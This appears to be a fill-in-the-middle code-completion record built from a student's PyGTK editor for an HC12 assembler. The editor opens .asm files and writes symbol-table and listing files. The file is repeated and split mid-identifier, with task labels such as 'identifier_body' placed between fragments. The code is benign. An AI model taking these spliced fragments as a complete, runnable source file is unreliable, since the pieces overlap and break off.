elif response == gtk.RESPONSE_CANCEL:
print "aborting save..."
dialog.destroy()
# se guardaron cambios y la bandera de modificación se apaga
self.text_buffer.set_modified(False)
def close(self,widget,data=None): # método llamado desde el menu "archivo -> cerrar"
print "Ctrl + W"
file_start = self.text_buffer.get_start_iter()
file_end = self.text_buffer.get_end_iter()
cont = self.text_buffer.get_text(file_start,file_end)
if self.text_buffer.get_modified():
message = "El Archivo ha sido modificado\n¿Desea guardar cambios?"
result_dialog = gtk.MessageDialog(self.window, gtk.DIALOG_MODAL | gtk.DIALOG_DESTROY_WITH_PARENT,
gtk.MESSAGE_QUESTION, gtk.BUTTONS_YES_NO, message)
result_dialog.set_title("Cerrar...")
#result_dialog.show_all()
response = result_dialog.run() # se lanza dialogo para salvar cambios
if response == gtk.RESPONSE_YES:
self.save_file(None)
gtk.main_quit()
def delete_event(self,widget,data=None): # método llamado a presionar boton cerrar
print "El programa se cerrará..."
gtk.main_quit()
def resultDialog(self,messageArray):
result_dialog = gtk.Dialog("Resultados de compilación",self.window,buttons=(gtk.STOCK_OK, gtk.RESPONSE_OK))
result_dialog.set_size_request(300, 300)
box = result_dialog.get_content_area()
scrolled_win = gtk.ScrolledWindow()
scrolled_win.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_ALWAYS)
string = ""
for i in messageArray:
string = string+i+"\n\n"
label = gtk.Label(string)
label.set_selectable(True)
scrolled_win.add_with_viewport(label)
box.add(scrolled_win)
result_dialog.show_all()
response = result_dialog.run()
if response == gtk.RESPONSE_OK:
result_dialog.destroy()
def run(self,widget,data=None):
objectLine = [] # se crea un arreglo para los objetos "linea"
print "Se presionó el botón run, aquí comienza la compilación del ensamblador"
file_start = self.text_buffer.get_start_iter()
file_end = self.text_buffer.get_end_iter()
self.code_in_buffer = self.text_buffer.get_text(file_start,file_end)
if self.code_in_buffer=="":
return
line = self.code_in_buffer.split('\n')
archivolist = str(self.namefile)
archivolist = archivolist[:-4] #quito extensión .asm
self.tbs = open(archivolist+".tbs",'w+') #creat archivo *.tbs (tabla de símbolos)
j = 0 #contador para aumentar el número de la línea a escribir en *.lst
# se crea una lista de objetos tipo Linea
for i in range(len(line)):
objectLine.append(Linea(line[i],i+1))
# creo un array para los mensajes de los objetos linea analizados
messageArray = []
lstArray = [] #creo lista para escribir en el archivo *.lst
post_processing = [] # lista de lineas que tienen una etiqueta como operando, se procesan después del *.tbs
dict_tbs = {} #diccionario con las etiquetas que existen en el *.tbs
n = 0 #número a sumar en el contloc
for i in objectLine:
if i.toString() != None:
#envío el tabop para que toString revise si existe la instrucción
messageArray.append(i.toString(self.tabop))
#se define el inicio del contador de localidades
self.contloc.add(n)
if i.get_opcode() == "ORG":
opr = i.get_operator()
val = self.get_dec(opr)
self.contloc.set_contloc(val)
i.set_val_contloc(self.contloc.get_format())
messageArray[-1]+="\nContloc: "+self.contloc.get_format()
lstArray.append(self.contloc.get_format()+"\t\t\t"+line[j]+"\n")
n = 0
# if(es un código de operación)
if self.tabop.tabop.has_key(i.get_opcode()):
n=i.get_totalbytes()
i.set_val_contloc(self.contloc.get_format())
messageArray[-1]+="\nContloc: "+self.contloc.get_format()
if i.get_operator()!=None:
# si el operando es una etiqueta, se añade a la cola de post-procesamiento (*.tbs stuffs :v)
if i.check_label(cad = i.get_operator()):
#linea -1 para saber en que indice de lstArray meterlo después (inicia en 0)
post_processing.append([i,i.line_number-1,self.contloc.get_format()])
else: # no es una etiqueta, entonces se añade sin pex :v
lstArray.append(self.contloc.get_format()+"\t"+i.get_machinecode(self.tabop)+"\t\t"+line[j]+"\n")
else:
lstArray.append(self.contloc.get_format()+" | s.write(i.get_label()+"\t"+self.contloc.get_format()+"\n")
dict_tbs[i.get_label()] = self.contloc.get_format()
if i.get_opcode() == "EQU":
opr = i.get_operator()
val = self.get_dec(opr)
n = 0
i.set_val_contloc(self.contloc.fotmatEqu(val))
messageArray[-1]+="\nContloc: "+self.contloc.fotmatEqu(val)
lstArray.append(self.contloc.fotmatEqu(val)+"\t\t\t"+line[j]+"\n")
self.tbs.write(i.get_label()+"\t"+self.contloc.fotmatEqu(val)+"\n")
dict_tbs[i.get_label()] = self.contloc.fotmatEqu(val)
if i.get_opcode() == "END":
i.set_val_contloc(self.contloc.get_format())
messageArray[-1]+="\nContloc: "+self.contloc.get_format()
lstArray.append(self.contloc.get_format()+"\t\t\t"+line[j]+"\n")
if i.get_label() != None:
self.tbs.write(str(i.get_label())+"\t"+self.contloc.get_format()+"\n")
dict_tbs[i.get_label()] = self.contloc.get_format()
break; # si es un END, termina de analizar el código
j+=1 # se aumenta la linea a escribir en el *.lst
else:
j+=1 # se aumenta la linea a escribir en el *.lst
continue
#cierro archivos creados al correr el código
self.tbs.close()
#se procesan las lineas con etiquetas (que están en post_processing
for i in post_processing:
if dict_tbs.has_key (i[0].get_operator()):
lstArray.insert(i[1], (i[2]+"\t"+i[0].get_machinecode(self.tabop,dict_tbs)+"\t\t"+line[i[1]]+"\n"))
else:
lstArray.insert(i[1],"Algo raro pasó, la etiqueta no está en el tbs\n")
self.lst = open(archivolist+".lst",'w+') #crear archivo *.lst
for line in lstArray:
self.lst.write(line)
self.lst.close()
# se llama método para mostrar en un Dialogo los resultados
self.resultDialog(messageArray)
def get_dec(self,opr):
"""método para obtener valor decimal de un ORG"""
if opr[0]=='$':
opr = opr[1:] # se le quita el '$'
valdec = int(opr,16) # str(hex) -> dec
elif opr[0]=='%':
opr = opr[1:] # se le quita el '%'
valdec = int(opr,2) # str(bin) -> dec
elif opr[0]=='@':
opr = opr[1:] # se le quita el '@'
valdec = int(opr,8) # str(oct) -> dec
else: #se infiere que es decimal
valdec = int(opr,10) # str(dec) -> dec
return valdec
def main(self):
gtk.main()
if __name__ == "__main__":
ventana = Ventana("Taller de programación de sistemas") # crear un objeto ventana con el titulo fijo
ventana.main() # llamar al iniciar la ventana
| \t"+i.get_machinecode(self.tabop)+"\t\t"+line[j]+"\n")
if i.get_label()!=None:
self.tb | conditional_block |
window.py | #!/usr/bin/env python
# coding=utf-8
"""Clase para el dibujado de la interfaz del proyecto del compilador HC12
Centro Universitario de Ciencias Exactas e Ingenierías
Simental Magaña Marcos Eleno Joaquín"""
import pygtk
pygtk.require('2.0')
import gtk
import gtksourceview
import sys
sys.path.append('../src')
from src.analizadorDeLineas import Linea
from src.dictabop import Tabop
from src.contLoc import Contloc
class Ventana:
def | aller de programación de sistemas") # crear un objeto ventana con el titulo fijo
ventana.main() # llamar al iniciar la ventana
| __init__(self,title,type=gtk.WINDOW_TOPLEVEL):
# crear, fijar titulo, fijar tamaño y conectar señal de la ventana
self.window = gtk.Window(type) # atributo window recibe objeto ventana del tipo 'type'
self.window.set_title(title) # se fija titulo recibido en el constructor
self.window.set_default_size(400,300) #(base,altura)
self.window.set_resizable(True)
self.window.connect("delete_event",self.delete_event)
# crear, empaquetar y conectar señales de la vBox
self.vBox = gtk.VBox(gtk.FALSE,0) # crear una caja vertical para empaquetar widgets
self.window.add(self.vBox) # empaquetar vBox en la ventana
# crear un item para menu (boton "Archivo")
self.menu_item_file = gtk.MenuItem("_Archivo")
# crear menu y empaquetar en la barra de menu
self.menu_bar = gtk.MenuBar() # se crea objeto del tipo MenuBar
self.menu_bar.append(self.menu_item_file)
self.vBox.pack_start(self.menu_bar,gtk.FALSE,gtk.FALSE,0) # empaquetar la barra en vBox
# insertar items al item "archivo"
self.menu = gtk.Menu()
self.menu_item = gtk.MenuItem("Abrir _archivo...")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.open_file)
self.menu_item_file.set_submenu(self.menu)
self.menu_item = gtk.MenuItem("_Guardar")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.save_file)
self.menu_item = gtk.MenuItem("_Cerrar")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.close)
self.menu_separator = gtk.SeparatorMenuItem() # crear un separador para un menu
self.menu.append(self.menu_separator) # insertar separador en el menu
self.menu_item = gtk.MenuItem("_Salir")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.delete_event)
# crear, empaquetar en vBox una hBox para los botones (barra superior)
self.hBox_botones = gtk.HBox(gtk.FALSE,0) # crear caja Horizontal para botones
self.vBox.pack_start(self.hBox_botones,gtk.FALSE,gtk.FALSE,0) #meter caja de botones a vBox
# crear, empaquetar en hBox_botones (barra superior) un boton con etiqueta "run",
# conectar señal "clicked" al método run
self.compile_button = gtk.Button("run") # crear boton con etiqueta "run"
self.hBox_botones.pack_start(self.compile_button,gtk.FALSE,gtk.FALSE,0) # meter boton en hBox
self.compile_button.connect("clicked",self.run) #conectar la señal clicked al método run
# crear, empaquetar en hBox_botones (barra superior) un boton con etiqueta "examinar" en el dialogo
self.file_chooser_button = gtk.Button("Examinar")
self.file_chooser_button.connect("clicked",self.open_file)
self.hBox_botones.pack_end(self.file_chooser_button,gtk.FALSE,gtk.FALSE,0) # meter boton en hbox
# crear un buffer para el TextView (text_area)
self.text_buffer = gtk.TextBuffer()
# crear, empaquetar eh vBox un area de texto (gtk.TextView)
self.text_area = gtk.TextView(self.text_buffer)
# añadir scroll al textView (text_area)
self.scroll_text = gtk.ScrolledWindow()
self.scroll_text.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
self.scroll_text.add(self.text_area)
# se insertó el area de edición de texto a una ventana con scroll, por lo que no se empaqueta en una Vbox,
# se empaqueta la ventana con scroll en la Vbox (la misma ventana contiene el area de edición de texto) -> por si no lo leíste antes
self.vBox.pack_start(self.scroll_text)
# mostrar todos los elementos de la ventana inclusive.
self.window.show_all()
#crear diccionario al crear la ventana
self.tabop = Tabop()
#crear un contador de localidades al crear ventana
self.contloc = Contloc()
def open_file(self,widget,data=None): # método llamado desde el menu "archivo -> Abrir archivo..."
print "opening file..."
dialog = gtk.FileChooserDialog("Examinar",self.window,gtk.FILE_CHOOSER_ACTION_OPEN,buttons=(gtk.STOCK_CANCEL,gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN,gtk.RESPONSE_OK))
filter = gtk.FileFilter() # para crear el filtro de archivo en la ventana de dialogo
filter.set_name("Archivo Ensamblador (*.asm)")
filter.add_pattern("*.asm")
filter.add_mime_type("text/txt")
dialog.add_filter(filter)
response = dialog.run()
if response == gtk.RESPONSE_OK:
self.namefile = dialog.get_filename()
self.file = open(self.namefile,'r+')
self.text_in_buffer = self.file.read()
self.text_buffer.set_text(self.text_in_buffer)
print self.text_buffer.get_line_count(), 'lineas leídas'
self.file.close()
print dialog.get_filename(), 'selected'
elif response == gtk.RESPONSE_CANCEL:
print 'No file selected...'
dialog.destroy()
def save_file(self,widget,data=None):
# se crean los iteradores para marcar el inicio y final del buffer, para guardar el archivo
file_start = self.text_buffer.get_start_iter()
file_end = self.text_buffer.get_end_iter()
try:
self.file = open(self.namefile,'w+')
self.file.write(self.text_buffer.get_text(file_start,file_end))
self.file.close()
except AttributeError:
print "saving a new file"
dialog = gtk.FileChooserDialog("Guardar como...",self.window,
gtk.FILE_CHOOSER_ACTION_SAVE,
buttons= (gtk.STOCK_CANCEL,gtk.RESPONSE_CANCEL,gtk.STOCK_SAVE,gtk.RESPONSE_OK))
filter = gtk.FileFilter()
filter.set_name("Archivo Ensamblador (*.asm)")
filter.add_pattern("*.asm")
filter.add_mime_type("text/txt")
dialog.add_filter(filter)
response = dialog.run()
if response == gtk.RESPONSE_OK:
self.namefile = dialog.get_filename()
# si al nombrar archivo el usuario no colocó extensión *.asm se le añade
if self.namefile.find(".asm") == -1:
self.namefile+=".asm"
self.file = open(self.namefile,'w+')
self.file.write(self.text_buffer.get_text(file_start,file_end))
self.file.close()
elif response == gtk.RESPONSE_CANCEL:
print "aborting save..."
dialog.destroy()
# se guardaron cambios y la bandera de modificación se apaga
self.text_buffer.set_modified(False)
def close(self,widget,data=None): # método llamado desde el menu "archivo -> cerrar"
print "Ctrl + W"
file_start = self.text_buffer.get_start_iter()
file_end = self.text_buffer.get_end_iter()
cont = self.text_buffer.get_text(file_start,file_end)
if self.text_buffer.get_modified():
message = "El Archivo ha sido modificado\n¿Desea guardar cambios?"
result_dialog = gtk.MessageDialog(self.window, gtk.DIALOG_MODAL | gtk.DIALOG_DESTROY_WITH_PARENT,
gtk.MESSAGE_QUESTION, gtk.BUTTONS_YES_NO, message)
result_dialog.set_title("Cerrar...")
#result_dialog.show_all()
response = result_dialog.run() # se lanza dialogo para salvar cambios
if response == gtk.RESPONSE_YES:
self.save_file(None)
gtk.main_quit()
def delete_event(self,widget,data=None): # método llamado a presionar boton cerrar
print "El programa se cerrará..."
gtk.main_quit()
def resultDialog(self,messageArray):
result_dialog = gtk.Dialog("Resultados de compilación",self.window,buttons=(gtk.STOCK_OK, gtk.RESPONSE_OK))
result_dialog.set_size_request(300, 300)
box = result_dialog.get_content_area()
scrolled_win = gtk.ScrolledWindow()
scrolled_win.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_ALWAYS)
string = ""
for i in messageArray:
string = string+i+"\n\n"
label = gtk.Label(string)
label.set_selectable(True)
scrolled_win.add_with_viewport(label)
box.add(scrolled_win)
result_dialog.show_all()
response = result_dialog.run()
if response == gtk.RESPONSE_OK:
result_dialog.destroy()
def run(self,widget,data=None):
objectLine = [] # se crea un arreglo para los objetos "linea"
print "Se presionó el botón run, aquí comienza la compilación del ensamblador"
file_start = self.text_buffer.get_start_iter()
file_end = self.text_buffer.get_end_iter()
self.code_in_buffer = self.text_buffer.get_text(file_start,file_end)
if self.code_in_buffer=="":
return
line = self.code_in_buffer.split('\n')
archivolist = str(self.namefile)
archivolist = archivolist[:-4] #quito extensión .asm
self.tbs = open(archivolist+".tbs",'w+') #creat archivo *.tbs (tabla de símbolos)
j = 0 #contador para aumentar el número de la línea a escribir en *.lst
# se crea una lista de objetos tipo Linea
for i in range(len(line)):
objectLine.append(Linea(line[i],i+1))
# creo un array para los mensajes de los objetos linea analizados
messageArray = []
lstArray = [] #creo lista para escribir en el archivo *.lst
post_processing = [] # lista de lineas que tienen una etiqueta como operando, se procesan después del *.tbs
dict_tbs = {} #diccionario con las etiquetas que existen en el *.tbs
n = 0 #número a sumar en el contloc
for i in objectLine:
if i.toString() != None:
#envío el tabop para que toString revise si existe la instrucción
messageArray.append(i.toString(self.tabop))
#se define el inicio del contador de localidades
self.contloc.add(n)
if i.get_opcode() == "ORG":
opr = i.get_operator()
val = self.get_dec(opr)
self.contloc.set_contloc(val)
i.set_val_contloc(self.contloc.get_format())
messageArray[-1]+="\nContloc: "+self.contloc.get_format()
lstArray.append(self.contloc.get_format()+"\t\t\t"+line[j]+"\n")
n = 0
# if(es un código de operación)
if self.tabop.tabop.has_key(i.get_opcode()):
n=i.get_totalbytes()
i.set_val_contloc(self.contloc.get_format())
messageArray[-1]+="\nContloc: "+self.contloc.get_format()
if i.get_operator()!=None:
# si el operando es una etiqueta, se añade a la cola de post-procesamiento (*.tbs stuffs :v)
if i.check_label(cad = i.get_operator()):
#linea -1 para saber en que indice de lstArray meterlo después (inicia en 0)
post_processing.append([i,i.line_number-1,self.contloc.get_format()])
else: # no es una etiqueta, entonces se añade sin pex :v
lstArray.append(self.contloc.get_format()+"\t"+i.get_machinecode(self.tabop)+"\t\t"+line[j]+"\n")
else:
lstArray.append(self.contloc.get_format()+"\t"+i.get_machinecode(self.tabop)+"\t\t"+line[j]+"\n")
if i.get_label()!=None:
self.tbs.write(i.get_label()+"\t"+self.contloc.get_format()+"\n")
dict_tbs[i.get_label()] = self.contloc.get_format()
if i.get_opcode() == "EQU":
opr = i.get_operator()
val = self.get_dec(opr)
n = 0
i.set_val_contloc(self.contloc.fotmatEqu(val))
messageArray[-1]+="\nContloc: "+self.contloc.fotmatEqu(val)
lstArray.append(self.contloc.fotmatEqu(val)+"\t\t\t"+line[j]+"\n")
self.tbs.write(i.get_label()+"\t"+self.contloc.fotmatEqu(val)+"\n")
dict_tbs[i.get_label()] = self.contloc.fotmatEqu(val)
if i.get_opcode() == "END":
i.set_val_contloc(self.contloc.get_format())
messageArray[-1]+="\nContloc: "+self.contloc.get_format()
lstArray.append(self.contloc.get_format()+"\t\t\t"+line[j]+"\n")
if i.get_label() != None:
self.tbs.write(str(i.get_label())+"\t"+self.contloc.get_format()+"\n")
dict_tbs[i.get_label()] = self.contloc.get_format()
break; # si es un END, termina de analizar el código
j+=1 # se aumenta la linea a escribir en el *.lst
else:
j+=1 # se aumenta la linea a escribir en el *.lst
continue
#cierro archivos creados al correr el código
self.tbs.close()
#se procesan las lineas con etiquetas (que están en post_processing
for i in post_processing:
if dict_tbs.has_key (i[0].get_operator()):
lstArray.insert(i[1], (i[2]+"\t"+i[0].get_machinecode(self.tabop,dict_tbs)+"\t\t"+line[i[1]]+"\n"))
else:
lstArray.insert(i[1],"Algo raro pasó, la etiqueta no está en el tbs\n")
self.lst = open(archivolist+".lst",'w+') #crear archivo *.lst
for line in lstArray:
self.lst.write(line)
self.lst.close()
# se llama método para mostrar en un Dialogo los resultados
self.resultDialog(messageArray)
def get_dec(self,opr):
"""método para obtener valor decimal de un ORG"""
if opr[0]=='$':
opr = opr[1:] # se le quita el '$'
valdec = int(opr,16) # str(hex) -> dec
elif opr[0]=='%':
opr = opr[1:] # se le quita el '%'
valdec = int(opr,2) # str(bin) -> dec
elif opr[0]=='@':
opr = opr[1:] # se le quita el '@'
valdec = int(opr,8) # str(oct) -> dec
else: #se infiere que es decimal
valdec = int(opr,10) # str(dec) -> dec
return valdec
def main(self):
gtk.main()
if __name__ == "__main__":
ventana = Ventana("T | identifier_body |
window.py | #!/usr/bin/env python
# coding=utf-8
"""Clase para el dibujado de la interfaz del proyecto del compilador HC12
Centro Universitario de Ciencias Exactas e Ingenierías
Simental Magaña Marcos Eleno Joaquín"""
import pygtk
pygtk.require('2.0')
import gtk
import gtksourceview
import sys
sys.path.append('../src')
from src.analizadorDeLineas import Linea
from src.dictabop import Tabop
from src.contLoc import Contloc
class Ventana:
def __init__(self,title,type=gtk.WINDOW_TOPLEVEL):
# crear, fijar titulo, fijar tamaño y conectar señal de la ventana
self.window = gtk.Window(type) # atributo window recibe objeto ventana del tipo 'type'
self.window.set_title(title) # se fija titulo recibido en el constructor
self.window.set_default_size(400,300) #(base,altura)
self.window.set_resizable(True)
self.window.connect("delete_event",self.delete_event)
# crear, empaquetar y conectar señales de la vBox
self.vBox = gtk.VBox(gtk.FALSE,0) # crear una caja vertical para empaquetar widgets
self.window.add(self.vBox) # empaquetar vBox en la ventana
# crear un item para menu (boton "Archivo")
self.menu_item_file = gtk.MenuItem("_Archivo")
# crear menu y empaquetar en la barra de menu
self.menu_bar = gtk.MenuBar() # se crea objeto del tipo MenuBar
self.menu_bar.append(self.menu_item_file)
self.vBox.pack_start(self.menu_bar,gtk.FALSE,gtk.FALSE,0) # empaquetar la barra en vBox
# insertar items al item "archivo"
self.menu = gtk.Menu()
self.menu_item = gtk.MenuItem("Abrir _archivo...")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.open_file)
self.menu_item_file.set_submenu(self.menu)
self.menu_item = gtk.MenuItem("_Guardar")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.save_file)
self.menu_item = gtk.MenuItem("_Cerrar")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.close)
self.menu_separator = gtk.SeparatorMenuItem() # crear un separador para un menu
self.menu.append(self.menu_separator) # insertar separador en el menu
self.menu_item = gtk.MenuItem("_Salir")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.delete_event)
# crear, empaquetar en vBox una hBox para los botones (barra superior)
self.hBox_botones = gtk.HBox(gtk.FALSE,0) # crear caja Horizontal para botones
self.vBox.pack_start(self.hBox_botones,gtk.FALSE,gtk.FALSE,0) #meter caja de botones a vBox
# crear, empaquetar en hBox_botones (barra superior) un boton con etiqueta "run",
# conectar señal "clicked" al método run
self.compile_button = gtk.Button("run") # crear boton con etiqueta "run"
self.hBox_botones.pack_start(self.compile_button,gtk.FALSE,gtk.FALSE,0) # meter boton en hBox
self.compile_button.connect("clicked",self.run) #conectar la señal clicked al método run
# crear, empaquetar en hBox_botones (barra superior) un boton con etiqueta "examinar" en el dialogo
self.file_chooser_button = gtk.Button("Examinar")
self.file_chooser_button.connect("clicked",self.open_file)
self.hBox_botones.pack_end(self.file_chooser_button,gtk.FALSE,gtk.FALSE,0) # meter boton en hbox
# crear un buffer para el TextView (text_area)
self.text_buffer = gtk.TextBuffer()
# crear, empaquetar eh vBox un area de texto (gtk.TextView)
self.text_area = gtk.TextView(self.text_buffer)
# añadir scroll al textView (text_area)
self.scroll_text = gtk.ScrolledWindow()
self.scroll_text.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
self.scroll_text.add(self.text_area)
# se insertó el area de edición de texto a una ventana con scroll, por lo que no se empaqueta en una Vbox,
# se empaqueta la ventana con scroll en la Vbox (la misma ventana contiene el area de edición de texto) -> por si no lo leíste antes
self.vBox.pack_start(self.scroll_text)
# mostrar todos los elementos de la ventana inclusive.
self.window.show_all()
#crear diccionario al crear la ventana
self.tabop = Tabop()
#crear un contador de localidades al crear ventana
self.contloc = Contloc()
def open_file(self,widget,data=None): # método llamado desde el menu "archivo -> Abrir archivo..."
print "opening file..."
dialog = gtk.FileChooserDialog("Examinar",self.window,gtk.FILE_CHOOSER_ACTION_OPEN,buttons=(gtk.STOCK_CANCEL,gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN,gtk.RESPONSE_OK))
filter = gtk.FileFilter() # para crear el filtro de archivo en la ventana de dialogo
filter.set_name("Archivo Ensamblador (*.asm)")
filter.add_pattern("*.asm")
filter.add_mime_type("text/txt")
dialog.add_filter(filter)
response = dialog.run()
if response == gtk.RESPONSE_OK:
self.namefile = dialog.get_filename()
self.file = open(self.namefile,'r+')
self.text_in_buffer = self.file.read()
self.text_buffer.set_text(self.text_in_buffer)
print self.text_buffer.get_line_count(), 'lineas leídas'
self.file.close()
print dialog.get_filename(), 'selected'
elif response == gtk.RESPONSE_CANCEL:
print 'No file selected...'
dialog.destroy()
def save_file(self,wi | =None):
# se crean los iteradores para marcar el inicio y final del buffer, para guardar el archivo
file_start = self.text_buffer.get_start_iter()
file_end = self.text_buffer.get_end_iter()
try:
self.file = open(self.namefile,'w+')
self.file.write(self.text_buffer.get_text(file_start,file_end))
self.file.close()
except AttributeError:
print "saving a new file"
dialog = gtk.FileChooserDialog("Guardar como...",self.window,
gtk.FILE_CHOOSER_ACTION_SAVE,
buttons= (gtk.STOCK_CANCEL,gtk.RESPONSE_CANCEL,gtk.STOCK_SAVE,gtk.RESPONSE_OK))
filter = gtk.FileFilter()
filter.set_name("Archivo Ensamblador (*.asm)")
filter.add_pattern("*.asm")
filter.add_mime_type("text/txt")
dialog.add_filter(filter)
response = dialog.run()
if response == gtk.RESPONSE_OK:
self.namefile = dialog.get_filename()
# si al nombrar archivo el usuario no colocó extensión *.asm se le añade
if self.namefile.find(".asm") == -1:
self.namefile+=".asm"
self.file = open(self.namefile,'w+')
self.file.write(self.text_buffer.get_text(file_start,file_end))
self.file.close()
elif response == gtk.RESPONSE_CANCEL:
print "aborting save..."
dialog.destroy()
# se guardaron cambios y la bandera de modificación se apaga
self.text_buffer.set_modified(False)
def close(self,widget,data=None): # método llamado desde el menu "archivo -> cerrar"
print "Ctrl + W"
file_start = self.text_buffer.get_start_iter()
file_end = self.text_buffer.get_end_iter()
cont = self.text_buffer.get_text(file_start,file_end)
if self.text_buffer.get_modified():
message = "El Archivo ha sido modificado\n¿Desea guardar cambios?"
result_dialog = gtk.MessageDialog(self.window, gtk.DIALOG_MODAL | gtk.DIALOG_DESTROY_WITH_PARENT,
gtk.MESSAGE_QUESTION, gtk.BUTTONS_YES_NO, message)
result_dialog.set_title("Cerrar...")
#result_dialog.show_all()
response = result_dialog.run() # se lanza dialogo para salvar cambios
if response == gtk.RESPONSE_YES:
self.save_file(None)
gtk.main_quit()
def delete_event(self,widget,data=None): # método llamado a presionar boton cerrar
print "El programa se cerrará..."
gtk.main_quit()
def resultDialog(self,messageArray):
result_dialog = gtk.Dialog("Resultados de compilación",self.window,buttons=(gtk.STOCK_OK, gtk.RESPONSE_OK))
result_dialog.set_size_request(300, 300)
box = result_dialog.get_content_area()
scrolled_win = gtk.ScrolledWindow()
scrolled_win.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_ALWAYS)
string = ""
for i in messageArray:
string = string+i+"\n\n"
label = gtk.Label(string)
label.set_selectable(True)
scrolled_win.add_with_viewport(label)
box.add(scrolled_win)
result_dialog.show_all()
response = result_dialog.run()
if response == gtk.RESPONSE_OK:
result_dialog.destroy()
def run(self,widget,data=None):
objectLine = [] # se crea un arreglo para los objetos "linea"
print "Se presionó el botón run, aquí comienza la compilación del ensamblador"
file_start = self.text_buffer.get_start_iter()
file_end = self.text_buffer.get_end_iter()
self.code_in_buffer = self.text_buffer.get_text(file_start,file_end)
if self.code_in_buffer=="":
return
line = self.code_in_buffer.split('\n')
archivolist = str(self.namefile)
archivolist = archivolist[:-4] #quito extensión .asm
self.tbs = open(archivolist+".tbs",'w+') #creat archivo *.tbs (tabla de símbolos)
j = 0 #contador para aumentar el número de la línea a escribir en *.lst
# se crea una lista de objetos tipo Linea
for i in range(len(line)):
objectLine.append(Linea(line[i],i+1))
# creo un array para los mensajes de los objetos linea analizados
messageArray = []
lstArray = [] #creo lista para escribir en el archivo *.lst
post_processing = [] # lista de lineas que tienen una etiqueta como operando, se procesan después del *.tbs
dict_tbs = {} #diccionario con las etiquetas que existen en el *.tbs
n = 0 #número a sumar en el contloc
for i in objectLine:
if i.toString() != None:
#envío el tabop para que toString revise si existe la instrucción
messageArray.append(i.toString(self.tabop))
#se define el inicio del contador de localidades
self.contloc.add(n)
if i.get_opcode() == "ORG":
opr = i.get_operator()
val = self.get_dec(opr)
self.contloc.set_contloc(val)
i.set_val_contloc(self.contloc.get_format())
messageArray[-1]+="\nContloc: "+self.contloc.get_format()
lstArray.append(self.contloc.get_format()+"\t\t\t"+line[j]+"\n")
n = 0
# if(es un código de operación)
if self.tabop.tabop.has_key(i.get_opcode()):
n=i.get_totalbytes()
i.set_val_contloc(self.contloc.get_format())
messageArray[-1]+="\nContloc: "+self.contloc.get_format()
if i.get_operator()!=None:
# si el operando es una etiqueta, se añade a la cola de post-procesamiento (*.tbs stuffs :v)
if i.check_label(cad = i.get_operator()):
#linea -1 para saber en que indice de lstArray meterlo después (inicia en 0)
post_processing.append([i,i.line_number-1,self.contloc.get_format()])
else: # no es una etiqueta, entonces se añade sin pex :v
lstArray.append(self.contloc.get_format()+"\t"+i.get_machinecode(self.tabop)+"\t\t"+line[j]+"\n")
else:
lstArray.append(self.contloc.get_format()+"\t"+i.get_machinecode(self.tabop)+"\t\t"+line[j]+"\n")
if i.get_label()!=None:
self.tbs.write(i.get_label()+"\t"+self.contloc.get_format()+"\n")
dict_tbs[i.get_label()] = self.contloc.get_format()
if i.get_opcode() == "EQU":
opr = i.get_operator()
val = self.get_dec(opr)
n = 0
i.set_val_contloc(self.contloc.fotmatEqu(val))
messageArray[-1]+="\nContloc: "+self.contloc.fotmatEqu(val)
lstArray.append(self.contloc.fotmatEqu(val)+"\t\t\t"+line[j]+"\n")
self.tbs.write(i.get_label()+"\t"+self.contloc.fotmatEqu(val)+"\n")
dict_tbs[i.get_label()] = self.contloc.fotmatEqu(val)
if i.get_opcode() == "END":
i.set_val_contloc(self.contloc.get_format())
messageArray[-1]+="\nContloc: "+self.contloc.get_format()
lstArray.append(self.contloc.get_format()+"\t\t\t"+line[j]+"\n")
if i.get_label() != None:
self.tbs.write(str(i.get_label())+"\t"+self.contloc.get_format()+"\n")
dict_tbs[i.get_label()] = self.contloc.get_format()
break; # si es un END, termina de analizar el código
j+=1 # se aumenta la linea a escribir en el *.lst
else:
j+=1 # se aumenta la linea a escribir en el *.lst
continue
#cierro archivos creados al correr el código
self.tbs.close()
#se procesan las lineas con etiquetas (que están en post_processing
for i in post_processing:
if dict_tbs.has_key (i[0].get_operator()):
lstArray.insert(i[1], (i[2]+"\t"+i[0].get_machinecode(self.tabop,dict_tbs)+"\t\t"+line[i[1]]+"\n"))
else:
lstArray.insert(i[1],"Algo raro pasó, la etiqueta no está en el tbs\n")
self.lst = open(archivolist+".lst",'w+') #crear archivo *.lst
for line in lstArray:
self.lst.write(line)
self.lst.close()
# se llama método para mostrar en un Dialogo los resultados
self.resultDialog(messageArray)
def get_dec(self,opr):
"""método para obtener valor decimal de un ORG"""
if opr[0]=='$':
opr = opr[1:] # se le quita el '$'
valdec = int(opr,16) # str(hex) -> dec
elif opr[0]=='%':
opr = opr[1:] # se le quita el '%'
valdec = int(opr,2) # str(bin) -> dec
elif opr[0]=='@':
opr = opr[1:] # se le quita el '@'
valdec = int(opr,8) # str(oct) -> dec
else: #se infiere que es decimal
valdec = int(opr,10) # str(dec) -> dec
return valdec
def main(self):
gtk.main()
if __name__ == "__main__":
ventana = Ventana("Taller de programación de sistemas") # crear un objeto ventana con el titulo fijo
ventana.main() # llamar al iniciar la ventana
| dget,data | identifier_name |
window.py | #!/usr/bin/env python
# coding=utf-8
"""Clase para el dibujado de la interfaz del proyecto del compilador HC12
Centro Universitario de Ciencias Exactas e Ingenierías
Simental Magaña Marcos Eleno Joaquín"""
import pygtk
pygtk.require('2.0')
import gtk
import gtksourceview
import sys
sys.path.append('../src')
from src.analizadorDeLineas import Linea
from src.dictabop import Tabop
from src.contLoc import Contloc
class Ventana:
def __init__(self,title,type=gtk.WINDOW_TOPLEVEL):
# crear, fijar titulo, fijar tamaño y conectar señal de la ventana
self.window = gtk.Window(type) # atributo window recibe objeto ventana del tipo 'type'
self.window.set_title(title) # se fija titulo recibido en el constructor
